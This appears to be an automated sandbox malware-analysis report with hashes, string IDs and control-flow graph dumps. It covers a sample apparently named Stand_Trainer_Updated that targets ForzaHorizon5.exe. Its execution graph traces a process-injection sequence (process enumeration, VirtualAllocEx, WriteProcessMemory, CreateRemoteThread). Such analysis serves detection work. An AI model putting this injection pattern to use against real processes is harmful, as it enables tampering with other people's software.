                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :U&-$:U&-
                                                                                      • API String ID: 0-271457029
                                                                                      • Opcode ID: 70c6eddfe5ec2a4dfd8607b6684dc455167fa46dddf14bd73af99acc91276603
                                                                                      • Instruction ID: 2734458584ebf0e684555960127a1c7f36e951d2b1a2e26553c0cea39ea21585
                                                                                      • Opcode Fuzzy Hash: 70c6eddfe5ec2a4dfd8607b6684dc455167fa46dddf14bd73af99acc91276603
                                                                                      • Instruction Fuzzy Hash: 8AF1C570508A8D8FEBA9DF28C8557E937D1FF59310F0492AEE84DC7291CB34D8458B82

                                                                                      Control-flow Graph

                                                                                      Function at 7ffaac640752 (calls 7ffaac640be0); rendered graph with executed/not-executed node colouring omitted.
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :U&-$:U&-
                                                                                      • API String ID: 0-271457029
                                                                                      • Opcode ID: 126337ad6fa6e2d8cc980f7f19142394772a0b36d6bc09ed9474630ac4479340
                                                                                      • Instruction ID: a0978b9cd5be64d79b94fa05cc49e615bbf61b6defdc50a5ccc9ea3465eace5a
                                                                                      • Opcode Fuzzy Hash: 126337ad6fa6e2d8cc980f7f19142394772a0b36d6bc09ed9474630ac4479340
                                                                                      • Instruction Fuzzy Hash: C3E1E330908A4E8FEBA9DF28C9557E977D1FB59310F04926ED84DC7291DE78E8848BC1

                                                                                      Control-flow Graph

                                                                                      Function at 7ffaac708341; rendered graph with executed/not-executed node colouring omitted.
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$6$r6$r6$r6
                                                                                      • API String ID: 0-4263799821
                                                                                      • Opcode ID: 186e8b2dff34dd2bf6b5fdb99fb9e55f962221ddfe15af5f109a6d9a5644813f
                                                                                      • Instruction ID: 9e61fd7352b5a06269adc9dcd0429069d43267a171247fcdc931f02969c463a8
                                                                                      • Opcode Fuzzy Hash: 186e8b2dff34dd2bf6b5fdb99fb9e55f962221ddfe15af5f109a6d9a5644813f
                                                                                      • Instruction Fuzzy Hash: DF023432A0EB899FF7D5DB6898546B57BE1EF56310F0841BAD04DC7593DA28DC0AC381

                                                                                      Control-flow Graph

                                                                                      Function at 7ffaac708520; rendered graph with executed/not-executed node colouring omitted.
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$6$r6$r6
                                                                                      • API String ID: 0-3088321380
                                                                                      • Opcode ID: a7ae750f39563f94dfa4d75180a5728d3c0b94245e952aa5b390ded950844105
                                                                                      • Instruction ID: cef0838989e19e8579c8a095e28f23a920352e523b7c80fff75df15c8b60ced0
                                                                                      • Opcode Fuzzy Hash: a7ae750f39563f94dfa4d75180a5728d3c0b94245e952aa5b390ded950844105
                                                                                      • Instruction Fuzzy Hash: 94A12532A0AA4A9FFBE4DB6888546797BF1FF56315F1841BAD00DC3683DE24DC498781

                                                                                      Control-flow Graph

                                                                                      Function at 7ffaac70536f; rendered graph with executed/not-executed node colouring omitted.
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }
                                                                                      • API String ID: 0-642806570
                                                                                      • Opcode ID: e2ccda88c90fde82f256ce261ab63ab8897673e106726d21c3a301f18abf493a
                                                                                      • Instruction ID: fe2562e457918e33e1678dd40b711ac03cad90aea39be2227f661ca2ffb3b2f9
                                                                                      • Opcode Fuzzy Hash: e2ccda88c90fde82f256ce261ab63ab8897673e106726d21c3a301f18abf493a
                                                                                      • Instruction Fuzzy Hash: D012227190EB899FEBD5DB2888595B57BF1EF56310B0881BED04DC7193CA28EC0AC785

                                                                                      Control-flow Graph

                                                                                      Function at 7ffaac64aaa4 (calls LoadLibraryExW); rendered graph with executed/not-executed node colouring omitted.
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 1b4e937d1205f50d502a18d93e0c3c757d2db69d59f2142e509b637900c40bf3
                                                                                      • Instruction ID: b18d8213904c0c30560835ccc0b09690d92d2a981fef325db9f7ec3a67946ba3
                                                                                      • Opcode Fuzzy Hash: 1b4e937d1205f50d502a18d93e0c3c757d2db69d59f2142e509b637900c40bf3
                                                                                      • Instruction Fuzzy Hash: FF31E13190CA4C9FDB19DB68D849AE9BBE0FF56320F04822BD009D3252DB74A845CB91

                                                                                      Control-flow Graph

                                                                                      Function at 7ffaac64a4ba (calls LoadLibraryExW); rendered graph with executed/not-executed node colouring omitted.
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: f75656a75ef35eb123a2fe076b6e2cb47837630de56ae4cf2686132356238dc7
                                                                                      • Instruction ID: c680b42f3774ff98a48b3712211251e5e939fe0d1662fc69d015756fa5822084
                                                                                      • Opcode Fuzzy Hash: f75656a75ef35eb123a2fe076b6e2cb47837630de56ae4cf2686132356238dc7
                                                                                      • Instruction Fuzzy Hash: E9217E71908A1C9FDB58DF58D849AE9BBE1FB69321F00822ED00ED3651DB70A8468B81

                                                                                      Control-flow Graph

                                                                                      Function at 7ffaac70283d; rendered graph with executed/not-executed node colouring omitted.
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a2509bd0e6a51e8b6f3b02d89d1af336ca10d022e1dc2d721b6e268030461c7b
                                                                                      • Instruction ID: c1836d8f53e203dfae4f37f12afbc5b3d5d7c9351154ef3cd0eb0839decc4fec
                                                                                      • Opcode Fuzzy Hash: a2509bd0e6a51e8b6f3b02d89d1af336ca10d022e1dc2d721b6e268030461c7b
                                                                                      • Instruction Fuzzy Hash: 8B811562A1EA8A9FE7E6DB2C48556B57FE0EF56210B1841FAD08DC7193DD18DC0AC3C1

                                                                                      Control-flow Graph

                                                                                      Function at 7ffaac702863; rendered graph with executed/not-executed node colouring omitted.
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0429936fd007c0f5a32abcbeb178a1a1c13614f3db1ac75cc932dab7b6f0db56
                                                                                      • Instruction ID: 5620270f18adc5c97f1d8030bf789e190a8bf9825c14db161842d85c9f973df8
                                                                                      • Opcode Fuzzy Hash: 0429936fd007c0f5a32abcbeb178a1a1c13614f3db1ac75cc932dab7b6f0db56
                                                                                      • Instruction Fuzzy Hash: 3F41C22291EB9A9FE7D6DB6844986747FF0EF56210B4840FAC04DDB193D928DC09C7C1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2O_^
                                                                                      • API String ID: 0-2974816419
                                                                                      • Opcode ID: 8353b451198fe71e8b4753c60720298820571aede2531c5a37f669e4618b5c71
                                                                                      • Instruction ID: 858a5279a9d1aa8c19461580011c56f03bed136c4e32d9aa4000b96f42048457
                                                                                      • Opcode Fuzzy Hash: 8353b451198fe71e8b4753c60720298820571aede2531c5a37f669e4618b5c71
                                                                                      • Instruction Fuzzy Hash: 5D61C25B90C16266E65273B9B4629FBBF10FF82739B08D177D28DCD2938D08688582E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ca04231eec50e4afb8eb8f12171ef53f5112393e3cb73edc7e717513006a6db3
                                                                                      • Instruction ID: f66fe1697936cfb7333683b3eb78259725509f1cdeae62236d7410c6133aeaec
                                                                                      • Opcode Fuzzy Hash: ca04231eec50e4afb8eb8f12171ef53f5112393e3cb73edc7e717513006a6db3
                                                                                      • Instruction Fuzzy Hash: CA91155BA0C57266E64273BEF4619FB7F10FF82735B089173D28DCD1938D08288A82E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6cd6707fadac5d61bd84bc6696791171e98da9e5feb1aafdf21cc274c4bad027
                                                                                      • Instruction ID: 825e56bc34394a1c27c82772e642ea35bfbeb884031adeeb06faab992e79957a
                                                                                      • Opcode Fuzzy Hash: 6cd6707fadac5d61bd84bc6696791171e98da9e5feb1aafdf21cc274c4bad027
                                                                                      • Instruction Fuzzy Hash: D631F27B50CA62AB9702BBB8F8655EAB790FF40324B40853AC38ECD163DD14B492C7C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$6$r6$r6$M_H
                                                                                      • API String ID: 0-1509768076
                                                                                      • Opcode ID: 4f7400448561d4f3ea3502219480babe682f38363fa846a01553671e82a2a35a
                                                                                      • Instruction ID: ca16e57eb12e49462612691e2f2d18c98facdf8cf5a9d89311e6974a4b1ce0a8
                                                                                      • Opcode Fuzzy Hash: 4f7400448561d4f3ea3502219480babe682f38363fa846a01553671e82a2a35a
                                                                                      • Instruction Fuzzy Hash: 8FB10361A0EA9A9FF7E9CB1884556747BE1EF56310F0881BED44DC7192DE28EC0987C0

                                                                                      Execution Graph

                                                                                      Execution Coverage:15.4%
                                                                                      Dynamic/Decrypted Code Coverage:0.3%
                                                                                      Signature Coverage:32.9%
                                                                                      Total number of Nodes:636
                                                                                      Total number of Limit Nodes:1
                                                                                      execution_graph (flat node/edge dump of the interactive viewer: `<id> <address> [API names]` declares a node, `<id>-><id>` an edge; condensed here to the API calls it records per routine, in edge order)
                                                                                      • 7ffb22651910: 7ffb22654920 (malloc; error paths through Concurrency::cancel_current_task, __std_exception_copy and _CxxThrowException) → 7ffb22651a06 VirtualAllocEx, WriteProcessMemory → 7ffb22651a83 VirtualAllocEx, WriteProcessMemory → 7ffb22651b09 VirtualAllocEx, WriteProcessMemory, CreateRemoteThread → 7ffb22651bab WaitForSingleObject → 7ffb22651be1 / 7ffb22651c05 / 7ffb22651c2a VirtualFreeEx (each followed by free) → 7ffb22654570 (8 API calls); error exits via _invalid_parameter_noinfo_noreturn
                                                                                      • 7ffb22651d80: 7ffb22654150 (6 API calls), 7ffb22653f70 (45 API calls) → 7ffb22651e84 malloc → 7ffb22651ea7 ReadProcessMemory → 7ffb22651eda WriteProcessMemory → 7ffb22654570 (8 API calls); second path 7ffb22653f50 (45 API calls) → 7ffb22651fa0 WriteProcessMemory → free
                                                                                      • 7ffb22651080 → 7ffb226510c0 (7 API calls) → 7ffb22651230 WriteProcessMemory → 7ffb22651261 WriteProcessMemory
                                                                                      • 7ffb22651d40: 7ffb22651d4e VirtualFreeEx
                                                                                      • 7ffb22655640: 7ffb22655652 WriteProcessMemory → free → free
                                                                                      • 7ffaac6645a1 → 7ffb22652010: CreateToolhelp32Snapshot → 7ffb22652052 Process32First → 7ffb22652070 strcmp → 7ffb22652085 Process32Next (loop) → 7ffb22654920 (malloc) → 7ffb22651720: memcpy → WriteProcessMemory (7ffb226518b8 / 7ffb226518ca / 7ffb226518dc) → 7ffb22652550 (free); then 7ffb22654200: CreateToolhelp32Snapshot → 7ffb2265425d Module32First → 7ffb226542b1 memcmp → 7ffb226542c2 Module32Next (loop) → 7ffb226542d2 OpenProcess → 7ffb22654920 (×3) → 7ffb22654570
                                                                                      • 7ffb22654570 (8 API calls; the call pattern of the MSVC CRT's __report_gsfailure): 7ffb22654d1c IsProcessorFeaturePresent → 7ffb22654df0 RtlCaptureContext → RtlLookupFunctionEntry → RtlVirtualUnwind → 7ffb22654ce8 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
                                                                                      • 7ffb226536e0 (reached from 7ffb226514a0 ?_Xlength_error@std@@YAXPEBD and 7ffb22653b70 memcpy/memset): 7ffb22653727 ReadProcessMemory, memcmp → 7ffb226531a0 (repeated 7ffb22654150 / 7ffb22653f70 calls; 7ffb22653f50 ?_Xout_of_range@std@@YAXPEBD) → 7ffb226535d8 VirtualAllocEx, WriteProcessMemory → 7ffb2265364a VirtualFreeEx; 7ffb22653a57 WriteProcessMemory, WriteProcessMemory; throws via 7ffb22653b5b _CxxThrowException; 7ffb22653f70: memcpy, memcpy → 7ffb226540c0 → free
                                                                                      • 7ffb226525f0: 7ffb22654920 (malloc) → 7ffb22652644 CreateThread → 7ffb22653da0 CloseHandle → 7ffb22654570
                                                                                      • 7ffb22652230: CreateToolhelp32Snapshot → 7ffb22652285 Process32First → 7ffb226522a9 Process32Next (loop) → 7ffb22654920 → 7ffb22651720 (67 API calls) → 7ffb2265237b GetForegroundWindow, GetWindowThreadProcessId → 7ffb226523d7 / 7ffb226523fb strcpy_s → 7ffb226536e0 (52 API calls) → 7ffb22652550 (2 API calls) → free → 7ffb22654570
                                                                                      • 7ffb226524a0: 7ffb226524b0 WriteProcessMemory → free → 7ffb226510c0 (7 API calls) → 7ffb22651230 / 7ffb22651261 WriteProcessMemory → 7ffb22652511 WriteProcessMemory
                                                                                      • 7ffb22652720 → 7ffb22653020 / 7ffb22652ff0 / 7ffb22652fc0 / 7ffb22652f90 / 7ffb22652f60 / 7ffb22652f30 → 7ffb22653050 (46 API calls, via 7ffb22654920 and 7ffb22653180) and 7ffb22653dd0 (malloc, free, 7ffb22653e5f ReadProcessMemory, 7ffb22653f50); further ReadProcessMemory at 7ffb22652b59, 7ffb22652cc7, 7ffb22652db2 → 7ffb22654570
                                                                                      • CRT and support routines (the module is a DLL: 7ffb22654658 __scrt_release_startup_lock → 7ffb22655360 _seh_filter_dll, 7ffb22655608 __scrt_dllmain_exception_filter): 7ffb226551b0 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter (security-cookie seeding); 7ffb22655428 __GSHandlerCheckCommon → __CxxFrameHandler4; 7ffb22654480 __std_type_info_compare; 7ffb226513b0 / 7ffb22651360 __std_exception_destroy; 7ffb22651460 / 7ffb226512a0 __std_exception_copy; 7ffb226544e0 ?_Xbad_function_call@std@; 7ffb22651030 → 7ffb22654920; 7ffb22655750, 7ffb226543c0, 7ffb22654540, 7ffb226544b0, 7ffb22652e70, 7ffb226515e0: free / _invalid_parameter_noinfo_noreturn cleanup paths

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 0 7ffaac661a48-7ffaac662d3f call 7ffaac660dd8 call 7ffaac660de8 * 3 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660de8 * 8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660df8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660d98 call 7ffaac660e08 call 7ffaac660d38 call 7ffaac660db8 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660dc8 call 7ffaac660d38 call 7ffaac660db8 call 7ffaac660e18 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660dc8 call 7ffaac660d38 call 7ffaac660db8 call 7ffaac660e18 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660dc8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660d98 call 7ffaac660e08 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660d98 call 7ffaac660e08 call 7ffaac660de8 * 3 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660df8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660e28 call 7ffaac660e38 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660e48 call 7ffaac660de8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660df8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660d98 call 7ffaac660e58 call 7ffaac660e68 call 7ffaac660e58 call 7ffaac660e68 call 7ffaac660e58 call 7ffaac660e68 call 7ffaac660e58 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660d98 call 7ffaac660e08 292 7ffaac662d51-7ffaac662d56 0->292 293 7ffaac662d41-7ffaac662d48 0->293 296 7ffaac662d69-7ffaac662dd3 call 7ffaac660e88 call 7ffaac660e98 call 7ffaac660de8 * 2 292->296 297 7ffaac662d58 292->297 294 7ffaac662d5a 
293->294 295 7ffaac662d4a-7ffaac662d50 293->295 298 7ffaac662d5c-7ffaac662d67 call 7ffaac660e78 294->298 299 7ffaac662dd6-7ffaac662df9 294->299 295->292 296->299 297->294 298->296 306 7ffaac662dfb-7ffaac662e0e 299->306 307 7ffaac662e15-7ffaac662e7f call 7ffaac660ea8 call 7ffaac660d48 299->307 306->307 324 7ffaac662e81-7ffaac662e98 307->324 325 7ffaac662e99-7ffaac662ef7 307->325 324->325 333 7ffaac662f11-7ffaac662f42 325->333 334 7ffaac662ef9-7ffaac662f0f 325->334 339 7ffaac662f43-7ffaac662f4c 333->339 334->333 341 7ffaac662f4e-7ffaac662f6f 339->341 344 7ffaac662f71-7ffaac662f87 341->344 345 7ffaac662f89-7ffaac663019 call 7ffaac660eb8 call 7ffaac660ec8 call 7ffaac660eb8 * 2 call 7ffaac660ec8 341->345 344->345 360 7ffaac66301e-7ffaac6630c3 call 7ffaac660eb8 call 7ffaac660ec8 call 7ffaac660eb8 call 7ffaac660ec8 call 7ffaac660eb8 call 7ffaac660ec8 345->360
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$b4$b4$b4$b4$b4$b4$b4$b4
                                                                                      • API String ID: 0-28069211
                                                                                      • Opcode ID: de1887fda7ae48c782369446a62109fc8137de8ac608e5ce8fe2f0575f491669
                                                                                      • Instruction ID: bab6c2c88c6877cf45120d8eb3bce4833f3565a952428948c966f0dfd529410d
                                                                                      • Opcode Fuzzy Hash: de1887fda7ae48c782369446a62109fc8137de8ac608e5ce8fe2f0575f491669
                                                                                      • Instruction Fuzzy Hash: E8F27B70619B45CFE399EF28C044AAAB7E1FF99304F50957DE04EC72A2CA35E845CB85

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CreateFirstNextSnapshotToolhelp32strcmp
                                                                                      • String ID: ForzaHorizon5.exe
                                                                                      • API String ID: 2015246625-4184888841
                                                                                      • Opcode ID: 7359882a146a30dbad1e41fb6eb8441f01d5a7ba2dc1f03e1a21fda49bb60f06
                                                                                      • Instruction ID: a326431277584aea0f05c4e7280ae13e0519b8ba7b63d8a3a898684e16e0e635
                                                                                      • Opcode Fuzzy Hash: 7359882a146a30dbad1e41fb6eb8441f01d5a7ba2dc1f03e1a21fda49bb60f06
                                                                                      • Instruction Fuzzy Hash: DE512CB7A29BC182FA528B35EC5026A73A4FB88B90F488131DA5E87764DFBCD455C740

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: b4$b4
                                                                                      • API String ID: 0-1499902546
                                                                                      • Opcode ID: 8700a8d17c066fcd57a2ce18d15cce4d528b2c54d0ce1684f8865780b8cd274f
                                                                                      • Instruction ID: b7bd7792d99ab0e27eb12cf7e4ec6eed97aef846a6790d669425b77b29c77d62
                                                                                      • Opcode Fuzzy Hash: 8700a8d17c066fcd57a2ce18d15cce4d528b2c54d0ce1684f8865780b8cd274f
                                                                                      • Instruction Fuzzy Hash: DDF13870619A45CFE399EF28C055B9AB7E1FF89300F50957EE08EC7292CA35E841CB45

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: j&$@n&
                                                                                      • API String ID: 0-4189027139
                                                                                      • Opcode ID: b66ca4ea2434c409b124a0883e1d041767e8cd581b667df6d9da697194737fea
                                                                                      • Instruction ID: c758f1fe195fe914ecb0a046e75ed2e3249c4d8ad21a5681ea55317855cdd2e1
                                                                                      • Opcode Fuzzy Hash: b66ca4ea2434c409b124a0883e1d041767e8cd581b667df6d9da697194737fea
                                                                                      • Instruction Fuzzy Hash: 00310997E1EA865BF79EE77888565B5EBD1FF62340B08A176D08EC3193DC19E80942C0

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1778f03b9567371556c83c611935d169559b6e47d46ef26cedd7f0ba253daa1b
                                                                                      • Instruction ID: 88eb1c8df260ba7b55aea5091cd4ec53e3e6a323a51868abe1f04eaeed7d7619
                                                                                      • Opcode Fuzzy Hash: 1778f03b9567371556c83c611935d169559b6e47d46ef26cedd7f0ba253daa1b
                                                                                      • Instruction Fuzzy Hash: B941D652D4FA869FF75AD77858661A9BF90EF22210B08A1BBD04C8B1D3ED18A80D42C5

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c03a05bf2d53332616b0a0148c9ef38881067ccab6569503b815eef2efd9f064
                                                                                      • Instruction ID: d8e7e01363701ff53e8ae010a3b7e6730327c8d3e820e7f1b0df25dce10e24ab
                                                                                      • Opcode Fuzzy Hash: c03a05bf2d53332616b0a0148c9ef38881067ccab6569503b815eef2efd9f064
                                                                                      • Instruction Fuzzy Hash: 7C417652B29E4A4BF69DEB3884A55F6A3D1FFA5310F40A47D914FC3293DC28E80A47C4

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 594 7ffaac6645a1-7ffaac66462f call 7ffb22652010 598 7ffaac664631-7ffaac66463c 594->598 599 7ffaac66463e 598->599 600 7ffaac664644-7ffaac66466f 598->600 599->600
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f5679770645bef816539e2b43060e1df51451643fc9ec1620a3e3230e85e81c9
                                                                                      • Instruction ID: 985cbd1ed0c479f22a8d3bb240fba49209e390e0ce769201085c0165e6681def
                                                                                      • Opcode Fuzzy Hash: f5679770645bef816539e2b43060e1df51451643fc9ec1620a3e3230e85e81c9
                                                                                      • Instruction Fuzzy Hash: 4B21917190CB4C8FDB68DF59D84AAFABBF0EB65321F00816FD04AD3552DA74A809CB51

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 602 7ffaac6644f5-7ffaac6644fa 603 7ffaac6644fe 602->603 604 7ffaac6644fc-7ffaac6644fd 602->604 605 7ffaac6644ff-7ffaac66450a 603->605 604->603 604->605 606 7ffaac66450e-7ffaac664548 call 7ffaac6643f0 605->606 607 7ffaac66450c-7ffaac66450d 605->607 613 7ffaac66454d-7ffaac66454f 606->613 607->606 614 7ffaac664551-7ffaac664563 613->614 615 7ffaac664566-7ffaac66459c 613->615 614->615
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
